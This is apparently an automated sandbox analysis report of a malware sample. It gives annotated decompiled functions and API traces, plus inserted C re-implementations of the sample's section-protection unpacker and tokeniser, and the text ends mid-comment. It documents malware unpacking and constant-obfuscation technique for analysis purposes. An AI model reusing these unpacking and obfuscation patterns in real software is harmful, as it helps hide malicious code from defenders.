            • Opcode ID: 78b5544cb55d854b6ea54cbe4359c8ec1909136f4df0ad3cfdf597013bd69910
            • Instruction ID: 53f70a672888b8a39cf668aae509daef712e8031e11c926e3049c14fb280d86d
            • Opcode Fuzzy Hash: 78b5544cb55d854b6ea54cbe4359c8ec1909136f4df0ad3cfdf597013bd69910
            • Instruction Fuzzy Hash: 8B51B331A0624CEFDF19DF9AC8847ADBBB6FF89354F14805AE8159B211C7789A41CB90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			_entry_() {
            				void* _t1;
            				int _t4;
            				int _t6;
            
            				// Loader entry point: private heap, own image base, then the main body in E004019F1.
            				_t6 = 0;
            				_t1 = HeapCreate(0, 0x400000, 0); // executed; growable private heap with a 4 MiB initial commit, handle kept at 0x404160
            				 *0x404160 = _t1;
            				if(_t1 != 0) {
            					 *0x404170 = GetModuleHandleA(0); // own image base
            					GetCommandLineW(); // executed; the decompiler shows no use of the result
            					// Main loader body. Its sub-calls (listed under APIs below) call NtQuerySystemInformation with class 8
            					// (SystemProcessorPerformanceInformation, a 0x30-byte buffer), Sleep, then read locale and UI language.
            					_t4 = E004019F1(); // executed
            					_t6 = _t4;
            					HeapDestroy( *0x404160);
            				}
            				ExitProcess(_t6); // exit code = return value of E004019F1
            			}

            Instruction addresses: 0x00401de2 to 0x00401e20.

            APIs
            • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401DEB
            • GetModuleHandleA.KERNEL32(00000000), ref: 00401DFB
            • GetCommandLineW.KERNEL32 ref: 00401E06
              • Part of subcall function 004019F1: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00401A26
              • Part of subcall function 004019F1: Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
              • Part of subcall function 004019F1: GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
              • Part of subcall function 004019F1: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
              • Part of subcall function 004019F1: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
              • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
              • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
            • HeapDestroy.KERNEL32 ref: 00401E19
            • ExitProcess.KERNEL32 ref: 00401E20
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
            • String ID:
            • API String ID: 1863574965-0
            • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
            • Instruction ID: 5d9c3f05f0f46dd7afa9dd855db83e90556071015df760abc973ca805bcb04d9
            • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
            • Instruction Fuzzy Hash: 0BE0B6B1403220ABC7116F71BE0CA4F7E28BB89B527000539FA05F2279CB384A41CADC
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0078024D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_780000_server.jbxd
            Yara matches
            Similarity
            • API ID: AllocVirtual
            • String ID: cess$kernel32.dll
            • API String ID: 4275171209-1230238691
            • Opcode ID: 6bdfaac6897b95ce373e99708c469e13dbd82992d17ba98ec564c2ec7f351265
            • Instruction ID: 8db1c3434d2ada7da5ffd95a7bf451fbefe288298b4c72c7a0d0cc5204748d9a
            • Opcode Fuzzy Hash: 6bdfaac6897b95ce373e99708c469e13dbd82992d17ba98ec564c2ec7f351265
            • Instruction Fuzzy Hash: 23C1ABB5D01228EFDF60CFA8D985BDDBBB5BF08300F108099E548A7252DB359A94DF51
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SysAllocString.OLEAUT32(80000002), ref: 007E43B5
            • SysAllocString.OLEAUT32(007E4D42), ref: 007E43F9
            • SysFreeString.OLEAUT32(00000000), ref: 007E440D
            • SysFreeString.OLEAUT32(00000000), ref: 007E441B
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: String$AllocFree
            • String ID:
            • API String ID: 344208780-0
            • Opcode ID: e99642ed9f762d1bbff29444dd298770ad74d8faed257f2e80d6a556cd207f84
            • Instruction ID: e8afaebe59bf701971430bb78b7f6c1e71c0cb9fd4998ab5ba79e2a1b3c124dd
            • Opcode Fuzzy Hash: e99642ed9f762d1bbff29444dd298770ad74d8faed257f2e80d6a556cd207f84
            • Instruction Fuzzy Hash: F9310EB6901289EFCB05DF99D8C49AE7BB5FF4D300B20842AF506DB250D7389A41CB65
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 65%
            			E007E213E(void* __ecx, intOrPtr _a4) {
            				struct _FILETIME _v12;
            				int _t13;
            				signed int _t16;
            				void* _t17;
            				signed int _t18;
            				unsigned int _t22;
            				void* _t30;
            				signed int _t34;
            
            				// Retry loop around E007E6269 with a time-derived, jittered back-off.
            				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
            				asm("stosd");
            				do {
            					_t13 = SwitchToThread(); // 0 or nonzero; folded into the jitter below
            					GetSystemTimeAsFileTime( &_v12);
            					_t22 = _v12.dwHighDateTime;
            					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5; // 64-bit FILETIME >> 5, rendered by the decompiler in 32-bit terms
            					_push(0);
            					_push(0x13);
            					_push(_t22 >> 5);
            					_push(_t16);
            					L007E8436(); // _aullrem: (FILETIME >> 5) % 0x13; the result comes back in eax, which the decompiler keeps calling _t16
            					_t34 = _t16 + _t13; // jitter = that remainder + the SwitchToThread() result
            					_t17 = E007E6269(_a4, _t34); // executed; the worker (memcpy inside), a return of 1 means "try again"
            					_t30 = _t17;
            					_t18 = 3;
            					Sleep(_t18 << (_t34 & 0x00000007)); // executed; 3 << (jitter & 7) ms, i.e. 3 to 384 ms
            				} while (_t30 == 1);
            				return _t30;
            			}

            Instruction addresses: 0x007e2143 to 0x007e21a3.

            APIs
            • SwitchToThread.KERNEL32(?,00000001,?,?,?,007E5044,?,?), ref: 007E214F
            • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,007E5044,?,?), ref: 007E215B
            • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 007E2174
              • Part of subcall function 007E6269: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 007E6308
            • Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,007E5044,?,?), ref: 007E2193
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
            • String ID:
            • API String ID: 1610602887-0
            • Opcode ID: 57fc43cb9f48d8bdb6534f51e147acb9f3adc5f15fd5052eb567c4dfbff0b020
            • Instruction ID: 2589ab9516b7cc5dc5c65511e7a16fc49768cf79e35f44ff518a1a8b66bb6c10
            • Opcode Fuzzy Hash: 57fc43cb9f48d8bdb6534f51e147acb9f3adc5f15fd5052eb567c4dfbff0b020
            • Instruction Fuzzy Hash: 18F0A477B41245BBD7149BA5CC5EBDF76BDDB88361F500124F601E7340E9B89A018694
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 50%
            			E007E5364(void** __esi) {
            				intOrPtr _v0;
            				intOrPtr _t4;
            				intOrPtr _t6;
            				void* _t8;
            				void* _t9;
            				intOrPtr _t10;
            				void* _t11;
            				void** _t13;
            
            				_t13 = __esi; // _t13[0] = current argument array, replaced below
            				_t4 =  *0x7ea3cc; // 0x2f19600: global context block
            				__imp__(_t4 + 0x40); // RtlEnterCriticalSection(ctx + 0x40), per the APIs list
            				while(1) {
            					// Wait, while holding the lock, until the value at ctx + 0x58 drops to zero
            					_t6 =  *0x7ea3cc; // 0x2f19600
            					_t1 = _t6 + 0x58; // 0x0
            					if( *_t1 == 0) {
            						break;
            					}
            					Sleep(0xa);
            				}
            				_t8 =  *_t13;
            				if(_t8 != 0 && _t8 != 0x7ea030) { // free the old array unless it is the static default in the module's writable data at 0x7ea000
            					HeapFree( *0x7ea2d8, 0, _t8);
            				}
            				_t9 = E007E12C6(_v0, _t13); // executed; re-tokenises the string _v0 and stores the new array in _t13[0] (see E007E12C6 below); always returns 0
            				_t13[1] = _t9;
            				_t10 =  *0x7ea3cc; // 0x2f19600
            				_t11 = _t10 + 0x40;
            				__imp__(_t11); // RtlLeaveCriticalSection(ctx + 0x40)
            				return _t11;
            			}

            Instruction addresses: 0x007e5364 to 0x007e53c1.

            APIs
            • RtlEnterCriticalSection.NTDLL(02F195C0), ref: 007E536D
            • Sleep.KERNEL32(0000000A), ref: 007E5377
            • HeapFree.KERNEL32(00000000,00000000), ref: 007E539F
            • RtlLeaveCriticalSection.NTDLL(02F195C0), ref: 007E53BB
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
            • String ID:
            • API String ID: 58946197-0
            • Opcode ID: 44aa88f5b0073540f4f747b47a9dac38429a44e495d61dd31e078c0a19e8d10d
            • Instruction ID: 43e9f158a70b052bd6a924c32b8869baccbb90349d358a1cbe49668922365fde
            • Opcode Fuzzy Hash: 44aa88f5b0073540f4f747b47a9dac38429a44e495d61dd31e078c0a19e8d10d
            • Instruction Fuzzy Hash: E3F0F4716035C2EBD7209F66DD89F167BE4AF5D384B04C414F601DE271D678E850DB29
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E007E5251(void* __edx) {
            				void* _v8;
            				int _v12;
            				WCHAR* _v16;
            				void* __edi;
            				void* __esi;
            				void* _t23;
            				intOrPtr _t24;
            				void* _t26;
            				intOrPtr _t32;
            				intOrPtr _t35;
            				intOrPtr _t38;
            				intOrPtr _t42;
            				void* _t45;
            				void* _t50;
            				void* _t52;
            
            				_t50 = __edx;
            				_v12 = 0;
            				_t23 = E007E6ADC(0,  &_v8); // executed; yields a handle or context in _v8, released through E007E7220 at the end
            				if(_t23 != 0) {
            					_v8 = 0;
            				}
            				// 0x7ea348 holds the base of a heap block of strings; the fixed offsets below select entries in it
            				_t24 =  *0x7ea348; // 0x272d5a8
            				_t4 = _t24 + 0x7ebc70; // 0x2f19218
            				_t5 = _t24 + 0x7ebb60; // 0x4f0053: the wide string begins L"SO" (plausibly a "SOFTWARE\..." key path)
            				_t26 = E007E33F1( &_v16, _v8, _t5, _t4); // executed; returns a heap string in _v16, freed below
            				_t45 = _t26;
            				if(_t45 == 0) {
            					StrToIntExW(_v16, 0,  &_v12); // parse the string as a decimal integer
            					_t45 = 8;
            					if(_v12 < _t45) {
            						_t45 = 1; // value below 8: skip the rest and return 1
            						__eflags = 1;
            					} else {
            						_t32 =  *0x7ea348; // 0x272d5a8
            						_t11 = _t32 + 0x7ebcc8; // 0x2f19270
            						_t48 = _t11;
            						_t12 = _t32 + 0x7ebb60; // 0x4f0053
            						_t52 = E007E5DE4(_t11, _t12, _t11); // builds a heap string from two table entries
            						_t59 = _t52;
            						if(_t52 != 0) {
            							_t35 =  *0x7ea348; // 0x272d5a8
            							_t13 = _t35 + 0x7ebcf0; // 0x30314549: the bytes read little-endian as "IE10"
            							if(E007E5157(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
            								_t61 =  *0x7ea2fc - 6;
            								if( *0x7ea2fc <= 6) { // gate on the global at 0x7ea2fc; what it holds is not shown here
            									_t42 =  *0x7ea348; // 0x272d5a8
            									_t15 = _t42 + 0x7ebcd2; // 0x52384549: the bytes read little-endian as "IE8R"
            									E007E5157(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
            								}
            							}
            							_t38 =  *0x7ea348; // 0x272d5a8
            							_t17 = _t38 + 0x7ebbb8; // 0x2f19160
            							_t18 = _t38 + 0x7ebc1c; // 0x680043: wide string beginning L"Ch"
            							_t45 = E007E5B0E(_v8, 0x80000001, _t52, _t18, _t17); // 0x80000001 = HKEY_CURRENT_USER
            							HeapFree( *0x7ea2d8, 0, _t52);
            						}
            					}
            					HeapFree( *0x7ea2d8, 0, _v16);
            				}
            				_t54 = _v8;
            				if(_v8 != 0) {
            					E007E7220(_t54);
            				}
            				return _t45;
            			}

            Instruction addresses: 0x007e5251 to 0x007e5363.

            APIs
            • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02F19218,00000000,?,74D0F710,00000000,74D0F730), ref: 007E52A0
            • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02F19160,?,00000000,30314549,00000014,004F0053,02F19270), ref: 007E533D
            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,007E68B6), ref: 007E534F
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0
            • Opcode ID: 508fe2d64be6e9d706f124248d122e50bd52bc0a0d2887547260b8237b7e4862
            • Instruction ID: 2c29c74a185216e52bc3c275e36749e39b337ac9d999b4435b3ee9fcf1dfec1b
            • Opcode Fuzzy Hash: 508fe2d64be6e9d706f124248d122e50bd52bc0a0d2887547260b8237b7e4862
            • Instruction Fuzzy Hash: 0831A03190228CFFCB11DB96DC88EAA3BBCFB4C748F140195B601AB121D7786E04DB15
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 87%
            			E004014CF(void* __eax, void* _a4) {
            				signed int _v8;
            				signed int _v12;
            				signed int _v16;
            				long _v20;
            				int _t42;
            				long _t53;
            				intOrPtr _t56;
            				void* _t57;
            				signed int _t59;
            
            				// Applies per-section page protections to the unpacked image at _a4; __eax points at its
            				// IMAGE_NT_HEADERS. No PAGE_* literal appears: each one is derived from the runtime key at 0x404180.
            				_v12 = _v12 & 0x00000000; // last error, 0 = success
            				_t56 =  *0x404180; // obfuscation key; the offsets below only yield valid protections for the value 0x43175ac3
            				_t57 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18; // first IMAGE_SECTION_HEADER = NT header + 0x18 + SizeOfOptionalHeader
            				_v16 =  *(__eax + 6) & 0x0000ffff; // FileHeader.NumberOfSections
            				// Headers (SizeOfHeaders at +0x54) become writable: 0x43175ac3 - 0x43175abf = 4 = PAGE_READWRITE
            				VirtualProtect(_a4,  *(__eax + 0x54), _t56 - 0x43175abf,  &_v20); // executed
            				_v8 = _v8 & 0x00000000; // section index
            				if(_v16 <= 0) {
            					L12:
            					return _v12;
            				} else {
            					goto L1;
            				}
            				while(1) {
            					L1:
            					_t59 = _v12;
            					if(_t59 != 0) {
            						goto L12; // stop at the first VirtualProtect failure
            					}
            					asm("bt [esi+0x24], eax"); // test a bit of Section.Characteristics (the bit index in eax is not shown)
            					if(_t59 >= 0) {
            						// non-executable path: PAGE_READWRITE or PAGE_READONLY
            						asm("bt [esi+0x24], eax");
            						if(__eflags >= 0) {
            							L8:
            							_t53 = _t56 - 0x43175abf; // 4 = PAGE_READWRITE
            							L9:
            							// VirtualAddress at +0xc, VirtualSize at +8
            							_t42 = VirtualProtect( *((intOrPtr*)(_t57 + 0xc)) + _a4,  *(_t57 + 8), _t53,  &_v20); // executed
            							if(_t42 == 0) {
            								_v12 = GetLastError();
            							}
            							// (0x43175ac3 - 0x3175ac2) * 0x28 = 0xa00000028, which wraps to 0x28 in 32 bits: one section header
            							_t57 = _t57 + (_t56 - 0x3175ac2) * 0x28;
            							_v8 = _v8 + 1;
            							if(_v8 < _v16) {
            								continue;
            							} else {
            								goto L12;
            							}
            						}
            						asm("bt [esi+0x24], eax");
            						_t53 = _t56 - 0x43175ac1; // 2 = PAGE_READONLY
            						if(__eflags >= 0) {
            							goto L9;
            						}
            						goto L8;
            					}
            					// executable path: PAGE_EXECUTE_READ or PAGE_EXECUTE_READWRITE
            					asm("bt [esi+0x24], eax");
            					if(_t59 >= 0) {
            						_t53 = _t56 - 0x43175aa3; // 0x20 = PAGE_EXECUTE_READ
            					} else {
            						_t53 = _t56 - 0x43175a83; // 0x40 = PAGE_EXECUTE_READWRITE
            					}
            					goto L9;
            				}
            				goto L12;
            			}

            Instruction addresses: 0x004014d9 to 0x004015ad.

            APIs
            • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
            • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
            • GetLastError.KERNEL32 ref: 00401583
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: ProtectVirtual$ErrorLast
            • String ID:
            • API String ID: 1469625949-0
            • Opcode ID: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
            • Instruction ID: db8870d9979c58085381c8b0541bfb0d1fdb36fbc34c572f0fe0e58abbf4653c
            • Opcode Fuzzy Hash: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
            • Instruction Fuzzy Hash: D1212B7280121AEFCB14CF95C9819AAF7B4FF58305F04487AE413AB960E738AA55CF58
            Uniqueness

            Uniqueness Score: -1.00%
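
            The following is an added example, not code from this report or from the sample: a host-side re-implementation of what the decompile of E004014CF above reads as, so the de-obfuscated protection values and the wrapping section stride can be checked offline. It assumes that the runtime key at 0x404180 is 0x43175AC3 (the only value for which all four derived constants are valid PAGE_* flags and the stride wraps to 0x28) and that the three `bt [esi+0x24], eax` tests are IMAGE_SCN_MEM_EXECUTE and IMAGE_SCN_MEM_WRITE; the bit indices held in eax are not visible in the excerpt, so the third test that can promote a read-only section is not modelled. The PE header it walks is constructed in the code.

```c
/* Added example (not from the report or the sample): what E004014CF reads as.
 * Assumptions: *0x404180 == 0x43175AC3; the Characteristics bits tested are
 * IMAGE_SCN_MEM_EXECUTE / IMAGE_SCN_MEM_WRITE. PE header below is constructed. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define PAGE_READONLY          0x02u
#define PAGE_READWRITE         0x04u
#define PAGE_EXECUTE_READ      0x20u
#define PAGE_EXECUTE_READWRITE 0x40u
#define IMAGE_SCN_MEM_EXECUTE  0x20000000u
#define IMAGE_SCN_MEM_WRITE    0x80000000u

static const uint32_t KEY = 0x43175AC3u;          /* assumed value of *0x404180 */

/* Every constant in E004014CF is written as KEY - offset, in 32-bit arithmetic. */
static uint32_t deobf(uint32_t offset) { return KEY - offset; }

/* Section-header stride as the sample computes it: (KEY - 0x3175AC2) * 0x28
 * is 0xA00000028, which truncates to 0x28, sizeof(IMAGE_SECTION_HEADER). */
uint32_t obf_stride(void) { return (KEY - 0x03175AC2u) * 0x28u; }

/* Protection E004014CF requests for a section with these Characteristics. */
uint32_t protect_for(uint32_t characteristics)
{
    int exec  = (characteristics & IMAGE_SCN_MEM_EXECUTE) != 0;
    int write = (characteristics & IMAGE_SCN_MEM_WRITE)   != 0;
    if (exec)
        return write ? deobf(0x43175A83u) : deobf(0x43175AA3u); /* 0x40 : 0x20 */
    return write ? deobf(0x43175ABFu) : deobf(0x43175AC1u);     /* 0x04 : 0x02 */
}

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* Walk the section table the way the decompile does: NumberOfSections at
 * NT header + 6, first header at NT header + 0x18 + SizeOfOptionalHeader
 * (+0x14), Characteristics at +0x24. Stores the protection chosen for each
 * section in out[] and returns how many were processed. */
size_t plan_section_rights(const uint8_t *nt, size_t nt_len, uint32_t *out, size_t max_out)
{
    if (nt_len < 0x18) return 0;
    size_t nsec = rd16(nt + 6);
    const uint8_t *sec = nt + 0x18 + rd16(nt + 0x14);
    size_t i;
    for (i = 0; i < nsec && i < max_out; i++, sec += obf_stride()) {
        if ((size_t)(sec - nt) + 0x28 > nt_len) break;     /* truncated table */
        out[i] = protect_for(rd32(sec + 0x24));
    }
    return i;
}

/* Constructed PE32 NT headers (0xE0-byte optional header) with three
 * sections: .text R-X, .rdata R--, .data RW-. Returns the bytes written. */
size_t build_sample_nt_header(uint8_t *buf, size_t cap)
{
    static const uint32_t chars[3] = { 0x60000020u, 0x40000040u, 0xC0000040u };
    size_t need = 0x18 + 0xE0 + 3 * 0x28;
    if (cap < need) return 0;
    memset(buf, 0, need);
    memcpy(buf, "PE\0\0", 4);
    wr16(buf + 4, 0x14c);        /* IMAGE_FILE_MACHINE_I386 */
    wr16(buf + 6, 3);            /* NumberOfSections */
    wr16(buf + 0x14, 0xE0);      /* SizeOfOptionalHeader */
    wr16(buf + 0x18, 0x10b);     /* PE32 magic */
    wr32(buf + 0x54, 0x400);     /* SizeOfHeaders: what the first VirtualProtect covers */
    for (int i = 0; i < 3; i++) {
        uint8_t *s = buf + 0x18 + 0xE0 + i * 0x28;
        wr32(s + 0x08, 0x1000);                        /* VirtualSize */
        wr32(s + 0x0c, 0x1000u * (uint32_t)(i + 1));   /* VirtualAddress */
        wr32(s + 0x24, chars[i]);
    }
    return need;
}

int main(void)
{
    uint8_t hdr[0x200];
    uint32_t prot[3];
    size_t len = build_sample_nt_header(hdr, sizeof hdr);
    size_t n = plan_section_rights(hdr, len, prot, 3);
    printf("headers -> VirtualProtect(base, 0x%x, 0x%02x)\n", rd32(hdr + 0x54), deobf(0x43175ABFu));
    for (size_t i = 0; i < n; i++)
        printf("section %zu -> VirtualProtect(base+rva, size, 0x%02x)\n", i, prot[i]);
    return 0;
}
```

            The stride arithmetic is the point worth keeping in mind when reading this unpacker: the literal 0x3175ac2 in the decompile is not a dropped digit, the 32-bit product simply wraps to 0x28, so a reader who "fixes" the constant to 0x43175ac2 gets the same stride but the wrong idea of the key.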

            C-Code - Quality: 47%
            			E007E12C6(char* _a4, char** _a8) {
            				char* _t7;
            				char* _t11;
            				char* _t14;
            				char* _t16;
            				char* _t17;
            				char _t18;
            				signed int _t20;
            				signed int _t22;
            
            				// Splits _a4 in place on spaces and stores the resulting pointer array in *_a8.
            				_t16 = _a4;
            				_push(0x20);
            				_t20 = 1; // slot count = number of spaces + 1, counted before trimming
            				_push(_t16);
            				while(1) {
            					_t7 = StrChrA(); // StrChrA(_t16, ' '); the arguments were pushed above
            					if(_t7 == 0) {
            						break;
            					}
            					_t20 = _t20 + 1;
            					_push(0x20);
            					_push( &(_t7[1]));
            				}
            				_t11 = E007E33DC(_t20 << 2); // heap-allocate slots * sizeof(char*) (RtlAllocateHeap wrapper, see APIs)
            				_a4 = _t11;
            				if(_t11 != 0) {
            					StrTrimA(_t16, 0x7e9278); // executed; trim set at 0x7e9278 (its contents are not shown)
            					_t22 = 0;
            					do {
            						_t14 = StrChrA(_t16, 0x20); // next space; only a space starts a cut
            						if(_t14 != 0) {
            							 *_t14 = 0; // terminate the current token
            							do {
            								// swallow the run of spaces/tabs that follows the cut
            								_t14 =  &(_t14[1]);
            								_t18 =  *_t14;
            							} while (_t18 == 0x20 || _t18 == 9);
            						}
            						_t17 = _a4;
            						 *(_t17 + _t22 * 4) = _t16;
            						_t22 = _t22 + 1;
            						_t16 = _t14;
            					} while (_t14 != 0);
            					 *_a8 = _t17; // the loop writes no terminating NULL; whether unused slots are zero depends on the allocator flags
            				}
            				return 0; // always 0; the result travels through _a8
            			}

            Instruction addresses: 0x007e12ca to 0x007e133d.

            APIs
            • StrChrA.SHLWAPI(?,00000020,00000000,02F195FC,?,?,007E53AF,?,02F195FC), ref: 007E12E2
            • StrTrimA.KERNELBASE(?,007E9278,00000002,?,007E53AF,?,02F195FC), ref: 007E1300
            • StrChrA.SHLWAPI(?,00000020,?,007E53AF,?,02F195FC), ref: 007E130B
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Trim
            • String ID:
            • API String ID: 3043112668-0
            • Opcode ID: a37b7e76afa6df6e6337813cba78dccae8ffb8e667e44e94d18f69bc452e9b73
            • Instruction ID: c52483e7f0bfd2ffa22620ec6871e951bbbf6fefb136b358c099f212a7fb56f0
            • Opcode Fuzzy Hash: a37b7e76afa6df6e6337813cba78dccae8ffb8e667e44e94d18f69bc452e9b73
            • Instruction Fuzzy Hash: D901B1713023CA6FE7104A6BCC8AFA77B9CEB9D340F944011BA55CB282D678D841C260
            Uniqueness

            Uniqueness Score: -1.00%
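
            The following is an added example, not code from this report or from the sample: the space-splitting routine that the decompile of E007E12C6 above reads as, rewritten host-side so its quirks can be exercised (a tab between two words does not split them; runs of spaces and tabs after a space are swallowed; the array is sized from the untrimmed space count, so it can have more slots than tokens and the loop never writes a terminating NULL). It assumes the trim set at 0x7e9278 is spaces and tabs (its contents are not shown) and stands in calloc for the E007E33DC allocation wrapper, whose heap flags the report does not list. The inputs are constructed.

```c
/* Added example (not from the report or the sample): what E007E12C6 reads as.
 * Assumptions: StrTrimA's set is " \t"; the allocator zero-fills (calloc). */
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* Stand-in for StrTrimA with a " \t" trim set: strips leading and trailing
 * spaces and tabs in place. */
static void trim_inplace(char *s)
{
    size_t n = strlen(s), start = 0;
    while (start < n && (s[start] == ' ' || s[start] == '\t')) start++;
    while (n > start && (s[n - 1] == ' ' || s[n - 1] == '\t')) n--;
    memmove(s, s + start, n - start);
    s[n - start] = '\0';
}

/* Tokenise exactly as E007E12C6 does: count spaces first to size the array
 * (spaces + 1 slots), trim, then cut at each ' ' and swallow any run of
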